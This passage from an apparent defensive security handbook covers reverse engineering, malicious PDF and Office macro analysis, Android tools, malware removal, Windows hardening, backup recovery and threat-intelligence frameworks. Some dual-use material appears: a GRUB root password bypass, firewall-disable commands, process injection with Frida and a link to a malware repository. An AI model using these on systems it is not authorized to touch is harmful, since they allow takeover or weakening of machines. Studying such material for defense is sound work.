Reverse Engineering
Definition
Reverse engineering is an advanced method to analyze
binaries including malware samples. It requires knowledge
of the CPU language, that is, Assembly. In reverse
engineering, we translate the binary back to its CPU
language to reveal all the instructions it sends to the
CPU.
PC Reverse Engineering
Basics
CPUs contain small pieces of memory called registers,
which are either 32 bits or 64 bits (4 bytes or 8 bytes)
in length, respectively. Registers may contain any integer
up to their size or a pointer to any piece of data.
Strings, for example, are null terminated, hence the
\0   you've seen in a lot of C, also   \x00 .
Registers
32 bit registers
The general purpose registers include (but are not limited
to) eax, ebx, edx, ecx, ebp,etc.
       ebp: the base pointer; it marks the base of the
       current stack frame.
       esp: the stack pointer; it points to the top of
       the stack, moving down as data is pushed and up
       as data is removed.
       eax: general purpose register; commonly used to
       hold return values and syscall numbers ($1 for
       exit, for example).
       ebx: general purpose register; commonly used to
       hold syscall arguments such as the exit status.
       64 bit registers
       Same as 32 bit, but the e prefix becomes r, and
       in AT&T syntax every register is preceded by %.
    Instructions
    ATT Instructions
     push (pushl): pushes a value onto the stack. Used
     mostly to push a variable onto the stack before
     using it in a function.
     movb and movl: move 1 byte (movb) or 4 bytes
     (movl) of data into a register.
     pop: takes the top value off the stack and places
     it into a register.
     addl
     addb
     imul
     inc
     dec
     int: triggers a system interrupt, which checks the
     register   %eax   for the syscall number; if
     %eax   contains   $1   as a value it makes the
     system exit the code.
     ret: an instruction that takes the return address
     off the stack into eip and jumps back to that
     point in the code to resume execution. Normally
     the return address is where we called our
     function: when you call a function, call pushes
     the return address onto the stack and jumps to the
     function start, so when you use   ret   you
     effectively pop the return address back off the
     stack.
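The push/pop/call/ret behaviour described above can be sketched as a toy stack model (illustrative only, not real CPU semantics):

```python
class ToyStack:
    """A minimal model of the call stack described above: push adds to
    the top, pop removes from the top, call saves a return address
    that ret later restores into the instruction pointer."""

    def __init__(self):
        self.stack = []
        self.eip = 0  # next-instruction pointer

    def push(self, value):
        self.stack.append(value)

    def pop(self):
        return self.stack.pop()

    def call(self, func_addr, return_addr):
        self.push(return_addr)  # call pushes the return address...
        self.eip = func_addr    # ...and jumps to the function start

    def ret(self):
        self.eip = self.pop()   # ret pops it back into eip
```

Walking through a call followed by a ret shows why overwriting the saved return address on the stack hijacks execution.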
Definitions and Terms
Stack
#Stack is your program's memory that grows downward.
It's used for local variables. The newest variables are
stored at the top of the stack and the oldest are buried
underneath.
Heap
#Heap is used for anything allocated with malloc().
Compiling Assembly Code
Remember when compiling your code to include a header if
you are cross compiling. Example is compiling a 32-bit
assembly code on a 64-bit CPU machine. You may include
the below header in that case
 .section .data
 .section .text
 .globl _start
 _start:
General Remarks
     When a function is called, the return address is
     stored on the stack.
     It's always recommended to test your program and
     how it handles input before starting the analysis.
     To get an idea of the system and library calls a
     binary makes, use [ltrace] along with providing
     your input.
 ltrace [binary-name] [input]
     Always try to read the source code if available to
     understand the ins and outs of the binary.
        Understanding how the program works helps
        tremendously in your analysis.
Reverse Engineering Tools
Radare2
Start the file
 root@kali:r2 -d ./[filename]
Analyze the file
 aa
List the function
 afl
List the main function
 pdf @main
Give visual representation of the code
 vvv
Setting a breakpoint at an address and continuing
 db [address]
 dc
Printing the value of a parameter
 ds
 px @ [name-variable]
Displaying registers values
 dr
Ghidra
Ghidra is a built-in tool in Kali Linux
dnSpy
PDF analysis & reverse engineering
PDF files are often embedded with malicious code by
attackers. Knowing if a pdf file is malicious or not starts
by analyzing the embedded code.
peepdf
Display embedded code
 root@kali:peepdf demo.pdf
Extracting the embedded code
 root@kali:echo 'extract js > demo2.pdf' >
 extracted_javascript.txt
 root@kali:peepdf -s extracted_javascript.txt
 demo.pdf
 root@kali:cat demo2.pdf
MS Office analysis & reverse engineering
MS files or office files are often embedded with malicious
VBA macros by attackers. Knowing if an office file is
malicious or not starts by analyzing the VBA macro.
Macros are also used legitimately to perform and automate
repetitive tasks.
vmonkey
Detecting and displaying macros with vmonkey
 root@kali:vmonkey malicious.doc
olevba.py
Detecting and displaying macros with olevba.py
[1]
 root@kali:olevba.py malicious.doc --reveal --
 decode
[2]
 root@kali:olevba malicious.doc --reveal --
 decode
oledump.py
Oledump allows you to analyze [office files] and [zip
files] and display data streams. Typically vba macros are
found in those streams. A stream with a vba macro has
the letter [M] beside it.
Displaying document streams
 oledump.py [office-file.xlsx]
 # example output is below with the file
 streams
 1: 114 '\x01CompObj'
 6: 365 'Macros/PROJECT'
 7: 41 'Macros/PROJECTwm'
 8: M 9852 'Macros/VBA/ThisDocument'
Revealing the content of a data stream
 oledump.py -s 1 [office-file.xlsx]
[1] is the stream number from the previous example
output.
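The listing format shown above can also be parsed to flag macro streams automatically. A Python sketch that looks for the [M] marker in oledump-style output:

```python
def macro_streams(listing):
    """From oledump-style listing text, return the stream numbers
    flagged with M (i.e. containing VBA macros)."""
    hits = []
    for line in listing.splitlines():
        parts = line.strip().split(None, 3)
        # expected shape: "<n>: [M] <size> '<name>'"
        if len(parts) >= 3 and parts[0].endswith(":") and parts[1] == "M":
            hits.append(int(parts[0].rstrip(":")))
    return hits
```

Against the sample output above this returns stream 8, the one to dump with `-s 8`.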
Revealing the content of a data stream containing VBA
Macro
We can use the below command as well. [-d] to dump the
raw content of the VBA Macro
 oledump.py -s 8 -d [office-file.xlsx]
Displaying the source code of the VBA Macro
We will use the option [-v] to decompress the content of
the VBA macro source code
 oledump.py -s 8 -v [office-file.xlsx]
Displaying the strings in the VBA Macro stream
Useful if you want to see raw strings or suspect that
there is an obfuscated or encoded content.
 oledump.py -s 8 -S [office-file.xlsx]
Extracting URLs from malicious VBA Macros
 oledump.py -p plugin_http_heuristics.py
 [office-file.xlsx]
Android Reverse Engineering
Tools
     APKtool
     An effective tool for APK file reverse engineering. It
     can reconstruct application resources after modifying
     the code, decoding them to almost their original
     state.
     Running the below command will unpack the sample
     APK,
 apktool d sample.apk
     JADX
     This program can decompile DEX (Dalvik Executable)
     files and translate them into understandable Java
      source code using both a command-line and graphical
      interface.
     Running the GUI with a sample APK
 jadx-gui sample.apk
     Dex2jar and JD-GUI
     With the aid of the utility dex2jar, DEX files can be
     converted to Java JAR files, which can then be
     viewed using the Java source code viewer JD-GUI.
     Radare2
     Explained above in PC Reverse Engineering
     Strings
     A straightforward tool that takes a binary file and
     extracts and shows readable strings from it. It is a
     useful tool for reverse-engineering Android programs
     and can extract strings from Android APK files.
     Frida
     Dynamic instrumentation toolkit for developers,
     reverse-engineers, and security researchers. Frida
     can do the below:
     Read app memory (Full memory access)
     Call methods/functions
     Hook methods/functions
     You can install Frida on Linux with below commands:
 pip install frida-tools
 pip install frida
Or simply download the latest release according to your OS
from here.
Frida can be invoked with below command:
 frida -U -l injection_script.js <process name
 or PID>
Example of scripts that can be used are found here.
Methodology
APK Structure Breakdown
       AndroidManifest.xml
       META-INF: contains certificate info.
       classes.dex: contains the dalvik bytecode for
       application in the DEX file format. This is the Java
       code that the application will run by default.
        lib/: contains native libraries for the application
        in CPU-specific directories, e.g. armeabi, mips.
       assets/: other files needed to make the app work.
       For example, in react native apps you may find files
       with extension   .bundle .         This directory may contain
       additional native libraries or DEX files.
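Since an APK is just a ZIP archive, the structure above can be inspected with nothing but the standard library. A Python sketch that reports which of the well-known members an APK contains:

```python
import zipfile

# Well-known APK members from the structure breakdown above
EXPECTED = ("AndroidManifest.xml", "classes.dex", "META-INF/", "lib/", "assets/")

def apk_overview(path):
    """Report which of the well-known APK members exist in the archive."""
    with zipfile.ZipFile(path) as z:
        names = z.namelist()
    return {item: any(n == item or n.startswith(item) for n in names)
            for item in EXPECTED}
```

A missing `META-INF/` (no signature) or multiple unexpected DEX files are quick red flags before opening the sample in JADX.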
Eradication and Malware Removal
Windows
There are many tools and security solutions to remove an
infection. If the infected machine has an Anti-Virus
installed or Windows Defender you can simply perform a
full scan to remove any infection that the Anti-Virus can
recognize.
#Tool-1 gmer.exe
Link
 http://www.gmer.net/?m=0
Running
 C:\> gmer.exe (GUI)
Kill running malicious file
 C:\> gmer.exe -killfile
 C:\WINDOWS\system32\drivers\<MALICIOUS
 FILENAME>.exe
Kill running malicious file in PowerShell
 PS C:\> Stop-Process -Name <PROCESS NAME>
 PS C:\> Stop-Process -ID <PID>
Linux
Stop a malware process
 # kill <MALICIOUS PID>
Remove the malicious file's execute permission and move it
to quarantine
 chmod -x /usr/sbin/<SUSPICIOUS FILE NAME>
 mkdir /home/quarantine/
 mv /usr/sbin/<SUSPICIOUS FILE NAME>
 /home/quarantine/
Recovery and Remediation
Patching
Windows
Check for and install updates
 C:\> wuauclt.exe /detectnow /updatenow
Linux
        Ubuntu
Fetch list of available updates
 # apt-get update
Strictly upgrade the current packages
 apt-get upgrade
Install updates (new ones)
 apt-get dist-upgrade
        Red Hat Enterprise Linux 2.1,3,4
 # up2date
To update non-interactively
 up2date-nox --update
To install a specific package
 # up2date <PACKAGE NAME>
To update a specific package
 up2date -u <PACKAGE NAME>
       Red Hat Enterprise Linux 5:
 pup
       Red Hat Enterprise Linux 6
 yum update
To list a specific installed package
 yum list installed <PACKAGE NAME>
To install a specific package
 yum install <PACKAGE NAME>
To update a specific package
 yum update <PACKAGE NAME>
Firewall Operations
Windows
Auditing current firewall rules
 C:\> netsh advfirewall firewall show rule
 name=all
Turn off/on the firewall
 C:\> netsh advfirewall set allprofile state on
 C:\> netsh advfirewall set allprofile state
 off
Enable firewall logging
 C:\> netsh firewall set logging droppedpackets
 = enable connections = enable
Block inbound and allow outbound traffic.
This rule can be used on workstations that don't play the
role of a server
 C:\> netsh advfirewall set currentprofile
 firewallpolicy
 blockinboundalways,allowoutbound
Open port 80 and allow inbound http traffic.
Usually it's applied on machines that play the role of a
webserver
 C:\> netsh advfirewall firewall add rule
 name="Open
 Port 80" dir=in action=allow protocol=TCP
 localport=80
Allow an application to receive inbound traffic.
 C:\> netsh advfirewall firewall add rule
 name="My
 Application" dir=in action=allow
 program="C:\MyApp\MyApp.exe" enable=yes
Allow an application to receive inbound traffic and specify
the profile, remote IP and subnet.
The profile value can be   public , private    or   domain
 netsh advfirewall firewall add rule name="My
 Application" dir=in action=allow
 program="C:\MyApp\MyApp.exe" enable=yes
 remoteip=ip1,172.16.0.0/16,LocalSubnet
 profile=domain
Delete a rule
 C:\> netsh advfirewall firewall delete rule
 name="<RULE NAME>" program="C:\MyApp\MyApp.exe"
Setting up the logging location
 C:\> netsh advfirewall set currentprofile
 logging filename
 C:\<LOCATION>\<FILE NAME>
Firewall logs location
 C:\> %systemroot%\system32\LogFiles\Firewall\
 pfirewall.log
You can also view the firewall log using Powershell
 PS C:\> Get-Content
 $env:systemroot\system32\LogFiles\Firewall\
 pfirewall.log
AppLocker
AppLocker enables you to control the execution of files
based on the file attributes such as file extension, file
name, publisher name, file path or hash.
You can create AppLocker rules either through group-policy
editor or through powershell
With GPO
Creating an AppLocker rule to allow only exe files signed
by the publisher
 Step 1: Create a new GPO.
 Step 2: Right-click on it to edit, then navigate
 through Computer Configuration, Policies, Windows
 Settings, Security Settings, Application Control
 Policies and AppLocker. Click Configure Rule
 Enforcement.
 Step 3: Under Executable Rules, check the
 Configured box and then make sure Enforce Rules
 is selected from the drop-down box. Click OK.
 Step 4: In the left pane, click Executable Rules.
 Step 5: Right-click in the right pane and select
 Create New Rule.
 Step 6: On the Before You Begin screen, click
 Next.
 Step 7: On the Permissions screen, click Next.
 Step 8: On the Conditions screen, select the
 Publisher condition and click Next.
 Step 9: Click the Browse button and browse to
 any executable file on your system. It doesn't
 matter which.
 Step 10: Drag the slider up to Any Publisher and
 then click Next.
 Step 11: Click Next on the Exceptions screen.
 Step 12: Name the policy, for example "only run
 executables that are signed", and click Create.
 Step 13: If this is your first time creating an
 AppLocker policy, Windows will prompt you to
 create the default rules; accept the prompt.
You can then enforce the GPO and restart
 C:\> gpupdate /force
 C:\> gpupdate /sync
 C:\> shutdown.exe /r
With PowerShell
Import the module
 PS C:\> import-module Applocker
Allow executable files under   C:\Windows\System32   to
run
 PS C:\> Get-ChildItem
 C:\Windows\System32\*.exe |
 Get-AppLockerFileInformation | New-
 AppLockerPolicy -RuleType Publisher,Hash
 -User Everyone -RuleNamePrefix System32
Showing local rules in a grid view
 PS C:\> Get-AppLockerPolicy -Local -Xml |
 Out-GridView
Security controls and hardening using
the Registry editor
Disallow an exe file from running. You can specify the
filename or with its path.
 C:\> reg add
 "HKCU\Software\Microsoft\Windows\CurrentVersio
 n\Policies\Explorer\DisallowRun" /v file-
 name.exe /t REG_SZ /d file-name.exe /f
Disable remote desktop connections
 C:\> reg add
 "HKLM\SYSTEM\CurrentControlSet\Control\Termina
 l Server" /f /v DenyTSConnections /t REG_DWORD
 /d 1
Disable anonymous enumeration of SAM accounts.
 C:\> reg add
 HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v
 restrictanonymoussam /t REG_DWORD /d 1 /f
Disable sticky keys
 C:\> reg add "HKCU\Control
 Panel\Accessibility\StickyKeys" /v Flags /t
 REG_SZ
 /d 506 /f
Disable Toggle Keys
 C:\> reg add "HKCU\Control
 Panel\Accessibility\ToggleKeys" /v Flags /t
 REG_SZ
 /d 58 /f
Disable On-screen keyboard
 C:\> reg add
 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
 \Authentication\LogonUI /f /v
 ShowTabletKeyboard /t
 REG_DWORD /d 0
Disable administrative shares:
Workstations
 C:\> reg add
 HKLM\SYSTEM\CurrentControlSet\Services\LanmanS
 erver\
 Parameters /f /v AutoShareWks /t REG_DWORD /d
 0
Servers
 C:\> reg add
 HKLM\SYSTEM\CurrentControlSet\Services\LanmanS
 erver\
 Parameters /f /v AutoShareServer /t REG_DWORD
 /d 0
Prevent pass-the-hash attacks
 C:\> reg add
 HKLM\SYSTEM\CurrentControlSet\Control\Lsa /f
 /v
 NoLMHash /t REG_DWORD /d 1
Enable UAC
 C:\> reg add
 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion
 \Polic
 ies\System /v EnableLUA /t REG_DWORD /d 1 /f
Recovery
The steps below can be followed to start the recovery of
the infected workstation/domain controller
     Restore from a trusted backup
     Reset all users' passwords and if the machine is a
     domain controller or part of a domain, reset all
     critical accounts' passwords such as privileged
     users and domain controllers.
     Change the password for the Kerberos service
     account and make it unusable for the attacker.
     Perform a thorough malware scanning of all domain
     controllers and domain-joined systems.
     Patching all vulnerable systems to prevent
     exploitation of systems through publicly available
     exploits.
     Disable the use of removable media on host
     computers, as attackers may propagate the malware
     on the whole network.
Backup and Restore
Windows
Group Policy Update and Recovery
Backup GPO Audit Policy to backup file
 C:\> auditpol /backup /file:C:\auditpolicy.csv
Restore GPO Audit Policy from backup file
 C:\> auditpol /restore
 /file:C:\auditpolicy.csv
Backup All GPOs in domain and save to Path
 PS C:\> Backup-Gpo -All -Path \\<SERVER>\<PATH
 TO BACKUPS>
Restore All GPOs in domain and save to Path
 PS C:\> Restore-GPO -All -Domain <INSERT
 DOMAIN
 NAME> -Path \\Server1\GpoBackups
Volume Shadow Service
VSS is used to create snapshots of files/entire volumes
while they are still in use. You can create or store
shadow copies on a local disk, external hard drive, or
network drive. Every time a system restore point is
created, you will have a valid shadow copy. Shadow Copy
maintains snapshots of the entire volumes, so you can
also use shadow copies to recover deleted files besides
restoring system.
Enabling and Creating Shadow Copies and system restore
points
Steps
 Step 1. Type **Create a restore point** in the
 search box and select it. Then, in the System
 Properties, **choose a drive** and
 click **Configure**.
 Step 2. In the new window, tick **Turn on
 system protection** and click **Apply** to
 enable.
 Step 3. Click **Create** to enable volume
 shadow copy in Windows 10.
Creating Shadow Copies and Restore Points using Task
Scheduler
By using task scheduler, you can create shadow copies
and restore points at a regular time intervals.
Steps
 Step 1. Open Task Scheduler. You can
 click **Start**, type **task scheduler** and
 select it from the list.
 Step 2. Click **Create Task** and then specify
 a name for the task (eg: ShadowCopy).
 Step 3. Create a new trigger. You can click
 the **Triggers** tab and **New...** option at
 the lower location, then select one setting
 among one time, daily, weekly, monthly.
 Step 4. Enable shadow copy. You can click
 the **Actions** tab and **New... option**,
 type **wmic** under the Program or script
 option, input the argument **shadowcopy call
 create Volume=C:\** at the blank box on the
 right side.
Restoring Shadow Copies using previous versions
Steps
 Step 1. **Navigate to the file or folder** you
 want to restore in a previous state and right-
 click it, then select Restore Previous
 Versions from the drop-down menu. In addition,
 you still can select **Properties** and click
 the **Previous Versions** tab.
 Step 2. Select the correct version of file or
 folder to restore.
 In this window, you can see 3 options,
 including **Open**, **Copy**, **Restore**.
 ● The Open button will navigate to the
 location where the file or folder is stored.
 ● The Copy button allows you to copy file or
 folder to another location on the computer,
 even on external hard drive.
 ● The Restore button gives you a chance to
 restore the file or folder to the same
 location and replace the existing version.
Restore Snapshots and Shadow Copies using Shadow
Explorer Tool
Download the tool from the below link
 https://www.shadowexplorer.com/downloads.html
Managing Shadow Copies From The Command Line
Start Volume Shadow Service
 C:\> net start VSS
List all shadow files and storage
 C:\> vssadmin List ShadowStorage
List all shadow files
 C:\> vssadmin List Shadows
Browse Shadow Copy for files/folders
 C:\> mklink /d c:\<CREATE FOLDER>\<PROVIDE
 FOLDER NAME BUT DO NOT CREATE>
 \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
Revert back to a selected shadow file on Windows Server
 C:\> vssadmin revert shadow /shadow={<SHADOW
 COPYID>} /ForceDismount
List a file's previous version history using
volrest.exe
 C:\> "\Program Files (x86)\Windows Resource
 Kits\Tools\volrest.exe" "\\localhost\c$\<PATH
 TO FILE>\<FILE NAME>"
Revert back to a selected previous file version or
@GMT file name for specific previous version using
volrest.exe
 C:\> subst Z: \\localhost\c$\<PATH TO FILE>
 C:\> "\Program Files (x86)\Windows Resource
 Kits\Tools\volrest.exe" "\\localhost\c$\<PATH
 TO FILE>\<CURRENT FILE NAME OR @GMT FILE NAME
 FROM LIST COMMAND ABOVE>" /R:Z:\
 C:\> subst Z: /D
Revert back a directory and subdirectory files
previous version using volrest.exe
 C:\> "\Program Files (x86)\Windows Resource
 Kits\Tools\volrest.exe" "\\localhost\c$\<PATH
 TO FOLDER>\*.*" /S /R:\\localhost\c$\<PATH TO
 FOLDER>\
Link to volrest.exe
 Ref. https://www.microsoft.com/en-us/
 download/details.aspx?id=17657
Managing Shadow Copies using wmic and PowerShell
Revert back to a selected shadow file on Windows Server
and Windows 7 and 10 using wmic
 C:\> wmic shadowcopy call create Volume='C:\'
Create a shadow copy of volume C on Windows 7 and 10
 PS C:\> (gwmi -list
 win32_shadowcopy).Create('C:\','ClientAccessible')
Create a shadow copy of volume C on Windows Server
2003 and 2008:
 C:\> vssadmin create shadow /for=c:
Create restore point on Windows
 C:\> wmic.exe /Namespace:\\root\default Path
 SystemRestore Call CreateRestorePoint
 "%DATE%", 100,7
List of restore points
 PS C:\> Get-ComputerRestorePoint
Restore from a specific restore point
 PS C:\> Restore-Computer -RestorePoint
 <RESTORE
 POINT#> -Confirm
Linux
Reset root password in single user mode
Step 1: Reboot system.
 reboot -f
Step 2: Press ESC at GRUB screen.
Step 3: Select default entry and then 'e' for edit.
Step 4: Scroll down until you see a line that
starts with linux, linux16 or linuxefi.
Step 5: At the end of that line, add a space and
then append the following (without the quotes):
 'rw init=/bin/bash'
Step 6: Press Ctrl-X to boot with the edited entry.
Step 7: After boot, you should be in single-user mode
as root; change the password.
 passwd
Step 8: Reboot system.
 reboot -f
Reinstall a package
 apt-get install --reinstall <COMPROMISED
 PACKAGE NAME>
Reinstall all packages
 # apt-get install --reinstall \
   $(dpkg --get-selections | grep -v deinstall | cut -f1)
Module 2: Threat Intelligence
and Hunting
Cyber Threat Intelligence
Definitions
From the blue team perspective, it's the collection and
analysis of the tactics, techniques and procedures (TTPs)
used by attackers in order to build detections.
From the red team perspective, it's the emulation of
adversaries' TTPs and the analysis of the blue team's
ability to build detections based on IOCs and TTPs.
#EX
Red team collects TTPs related to a certain hacking
group from threat intelligence frameworks to
create tools and emulate this hacking group's behaviour in
an engagement.
In cyber threat intelligence, we aim to answer the below
questions:
     Who’s attacking you?
     What are their motivations?
     What are their capabilities?
     What artefacts and indicators of compromise (IOCs)
     should you look out for?
Information Sharing and Analysis
Centers (ISACs)
ISACs are used to share and exchange various Indicators
of Compromise (IOCs) in order to obtain threat intelligence.
TTP
An acronym for Tactics, Techniques, and Procedures.
 The Tactic is the adversary's goal or
 objective.
 The Technique is how the adversary achieves
 the goal or objective.
 The Procedure is how the technique is
 executed.
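As a concrete illustration, the three levels can be laid out as follows. This is a sketch: the tactic and technique names are taken from MITRE ATT&CK (technique T1003), while the procedure line is a made-up example of how one actor might execute it.

```python
# Illustrative breakdown of one TTP entry, using OS Credential
# Dumping (MITRE ATT&CK T1003) as the example technique.
ttp = {
    "tactic": "Credential Access",          # the adversary's goal
    "technique": "OS Credential Dumping",   # how the goal is achieved
    "procedure": "Run Mimikatz's sekurlsa::logonpasswords "
                 "against LSASS memory",    # the concrete execution
}

for level, value in ttp.items():
    print(f"{level:>9}: {value}")
```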
How to gather threat intelligence
     Internal:
          Vulnerability assessments and incident response
          reports.
          Cyber awareness training reports.
          System logs and events.
     Community:
          Web forums.
          Dark web communities for cybercriminals.
     External
          Threat intel feeds (Commercial & Open-source).
          Online marketplaces.
          Public sources include government data,
          publications, social media, financial and
          industrial assessments.
          Malware Repositories.
 https://www.trendmicro.com/vinfo/us/threat-
 encyclopedia
 https://github.com/ytisf/theZoo
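Many open-source feeds publish IOCs as plain text, one indicator per line with `#` comment lines. A minimal sketch of ingesting such a feed follows; the sample data and its format are hypothetical, and real feeds vary.

```python
def parse_feed(text: str) -> list[str]:
    """Extract IOC lines from a plain-text feed, skipping comments and blanks."""
    iocs = []
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            iocs.append(line)
    return iocs

# Hypothetical feed content (RFC 5737 documentation addresses).
sample = """# hypothetical open-source IP feed
203.0.113.10
198.51.100.7
"""
print(parse_feed(sample))  # → ['203.0.113.10', '198.51.100.7']
```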
Threat Intelligence Types
Strategic
Assists senior management in making informed decisions,
specifically about the security budget and strategies.
Tactical
Interacts with the TTPs and attack models to identify
adversary attack patterns.
Operational
Interact with IOCs and how the adversaries operationalize.
Steps to create threat intelligence
campaign
 1. Identify framework and general kill chain
 2. Determine targeted adversary
 3. Identify adversary's TTPs and IOCs
 4. Map gathered threat intelligence to a kill
 chain or framework
 5. Draft and maintain needed engagement
 documentation
 6. Determine and use needed engagement
 resources (tools, C2 modification, domains,
 etc.)
Lifecycle Phases of Cyber threat
intelligence
Direction
Defining the goals and objectives by preparing the below:
     Information assets and business processes that
     require defending.
     Potential impact to be experienced on losing the
     assets or through process interruptions.
     Sources of data and intel to be used towards
     protection.
     Tools and resources that are required to defend the
     assets.
Collection
Analysts start gathering the data by using commercial,
private and open-source resources available. Due to the
volume of data analysts usually face, it is recommended
to automate this phase to provide time for triaging
incidents.
Processing
Raw logs, vulnerability information, malware and network
traffic usually come in different formats and may be
disconnected when used to investigate an incident. This
phase ensures that the data is extracted, sorted,
organised, correlated with appropriate tags and presented
visually in a usable and understandable format to the
analysts. SIEMs are valuable tools for achieving this and
allow quick parsing of data.
Analysis
Once the information aggregation is complete, security
analysts must derive insights. Decisions to be made may
involve:
     Investigating a potential threat through uncovering
     indicators and attack patterns.
     Defining an action plan to avert an attack and defend
     the infrastructure.
     Strengthening security controls or justifying
     investment for additional resources.
Dissemination
Different organisational stakeholders will consume the
intelligence in varying languages and formats. For
example, C-suite members will require a concise report
covering trends in adversary activities, financial
implications and strategic recommendations. At the same
time, analysts will more likely inform the technical team
about the threat IOCs, adversary TTPs and tactical action
plans.
Feedback
The final phase covers the most crucial part, as analysts
rely on the responses provided by stakeholders to improve
the threat intelligence process and implementation of
security controls. Feedback should be regular interaction
between teams to keep the lifecycle working.
Threat Intelligence Frameworks
Threat intelligence frameworks collect TTPs and categorize
them according to:
 1. Threat Group
 2. Kill Chain Phase
 3. Tactic
 4. Objective/Goal
MITRE ATT&CK
Link
https://attack.mitre.org/
Definition
MITRE ATT&CK (Adversarial Tactics, Techniques, and
Common Knowledge) is a comprehensive, globally
accessible knowledge base of cyber adversary behaviour
and tactics. Developed by the MITRE Corporation, it is a
valuable resource for organizations to understand the
different stages of cyber attacks and develop effective
defences.
How it works
The ATT&CK framework is organized into a matrix that
covers various tactics (high-level objectives) and
techniques (methods used to achieve goals). The
framework includes descriptions, examples, and
mitigations for each technique, providing a detailed
overview of threat actors' methods and tools.
Use Cases
Identifying potential attack paths based on your
infrastructure
Based on your assets, the framework can map possible
attack paths an attacker might use to compromise your
organization. For example, if your organization uses Office
365, all techniques attributed to this platform are relevant
to your threat modelling exercise.
Developing threat scenarios
MITRE ATT&CK has attributed all tactics and techniques to
known threat groups. This information can be leveraged to
assess your organization based on threat groups identified
to be targeting the same industry.
Prioritizing vulnerability remediation
The information provided for each MITRE ATT&CK technique
can be used to assess the significant impact that may
occur if your organisation experiences a similar attack.
Given this, your security team can identify the most
critical vulnerabilities to address.
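The Office 365 example above can be sketched as a simple filter over technique records. This is a toy sketch: the real ATT&CK data set is distributed as a STIX bundle, and the two hand-written records below are abbreviated stand-ins for it.

```python
# Simplified, hand-made records standing in for ATT&CK technique
# entries; the real data is distributed as a STIX bundle by MITRE.
techniques = [
    {"id": "T1566", "name": "Phishing",
     "platforms": ["Windows", "macOS", "Linux", "Office 365"]},
    {"id": "T1059", "name": "Command and Scripting Interpreter",
     "platforms": ["Windows", "macOS", "Linux"]},
]

def relevant_to(platform: str) -> list[dict]:
    """Return techniques applicable to a platform, for threat modelling."""
    return [t for t in techniques if platform in t["platforms"]]

for t in relevant_to("Office 365"):
    print(t["id"], t["name"])
```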
TIBER-EU (Threat Intelligence-Based Ethical
Red Teaming)
Link
https://www.ecb.europa.eu/pub/pdf/other/ecb.tiber_eu_
framework.en.pdf
OST Map
Link
https://www.intezer.com/ost-map/
TAXII
Link
https://oasis-open.github.io/cti-
documentation/taxii/intro
STIX
Link
https://oasis-open.github.io/cti-documentation/stix/intro
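To make the format concrete, here is a minimal STIX 2.1 indicator built by hand with the standard library. This is a sketch: in practice the official `stix2` Python library generates and validates these objects, and the IP value below is an illustrative documentation address.

```python
import json
import uuid
from datetime import datetime, timezone

# Minimal STIX 2.1 indicator object built by hand; covers the
# required properties (type, spec_version, id, created, modified,
# pattern, pattern_type, valid_from).
now = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%S.000Z")
indicator = {
    "type": "indicator",
    "spec_version": "2.1",
    "id": f"indicator--{uuid.uuid4()}",
    "created": now,
    "modified": now,
    "name": "Known C2 IP address",
    "pattern": "[ipv4-addr:value = '203.0.113.10']",
    "pattern_type": "stix",
    "valid_from": now,
}
print(json.dumps(indicator, indent=2))
```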
The Diamond Model
Definition and Components
The Diamond Model is composed of four core features:
adversary, infrastructure, capability, and victim to help
analyze intrusions and give insights on the threat actor.
An adversary is also known as an attacker, enemy,
cyber threat actor, or hacker. The adversary is the
person who stands behind the cyberattack. Cyberattacks
can be an intrusion or a breach.
It is difficult to identify an adversary during the first
stages of a cyberattack. Utilizing data collected from an
incident or breach, signatures, and other relevant
information can help you determine who the adversary
might be.
Victim is a target of the adversary. A victim can be an
organization, person, target email address, IP address,
domain, etc. It's essential to understand the difference
between the victim persona and the victim assets because
they serve different analytic functions.
Capability is also known as the skill, tools, and
techniques used by the adversary in the event. The
capability highlights the adversary’s tactics, techniques,
and procedures (TTPs).
Capability Capacity is all of the vulnerabilities and
exposures that the individual capability can use.
Adversary Arsenal is a set of capabilities that belong
to an adversary. The combined capacities of an
adversary's capabilities make it the adversary's arsenal.
Infrastructure is also known as software or hardware.
Infrastructure is the physical or logical interconnections
that the adversary uses to deliver a capability or maintain
control of capabilities. For example, a command and
control centre (C2) and the results from the victim (data
exfiltration).
Type 1 Infrastructure is the infrastructure controlled or
owned by the adversary.
Type 2 Infrastructure is the infrastructure controlled by
an intermediary. Sometimes the intermediary might or
might not be aware of it. This is the infrastructure that a
victim will see as the adversary. Type 2 Infrastructure
has the purpose of obfuscating the source and attribution
of the activity. Type 2 Infrastructure includes malware
staging servers, malicious domain names, compromised
email accounts, etc.
Service Providers are organizations that provide
services considered critical for the adversary availability
of Type 1 and Type 2 Infrastructures, for example,
Internet Service Providers, domain registrars, and
webmail providers.
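The four core features can be captured in a small data structure when recording an intrusion event. This is a sketch only: all of the field values below are invented for illustration.

```python
from dataclasses import dataclass

@dataclass
class DiamondEvent:
    """One intrusion event described by the four Diamond Model vertices."""
    adversary: str
    capability: str
    infrastructure: str
    victim: str

# Hypothetical event: every value is made up for illustration.
event = DiamondEvent(
    adversary="Unknown actor (tracked internally as UNC-0000)",
    capability="Spear-phishing email with macro-enabled document",
    infrastructure="Type 2: compromised mail server used for delivery",
    victim="finance@victim.example",
)
print(event)
```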
The Unified Kill Chain
Definition and Components
The Unified Kill Chain is used to describe the
methodology/path attackers such as hackers or APTs
use to approach and intrude into a target.
Components
The UKC states that there are 18 phases to an attack,
covering everything from reconnaissance to data
exfiltration and understanding an attacker's motive.
These phases have
been grouped together as the figure below shows
The Cyber Kill Chain
Definition
The Cyber Kill Chain helps in understanding and protecting
against ransomware attacks, security breaches as well
as Advanced Persistent Threats (APTs). We can use the
Cyber Kill Chain to assess your network and system
security by identifying missing security controls and
closing certain security gaps based on your company's
infrastructure.
Phases of an attack in Cyber kill chain
Reconnaissance
Reconnaissance is discovering and collecting information
on the system and the victim. The reconnaissance phase
is the planning phase for the adversaries. OSINT (Open-
Source Intelligence) also falls under reconnaissance.
Weaponization
In this phase, the attacker prepares the infrastructure
necessary to perform the attack. Examples are below:
 - Creating an infected Microsoft Office
 document containing a malicious macro or VBA
 scripts.
 - Creating a malicious payload or a very
 sophisticated worm, implanting it on USB
 drives, and then distributing them in public.
 - Creating a Command and Control (C2) server
 for executing commands on the victim's
 machine or delivering more payloads.
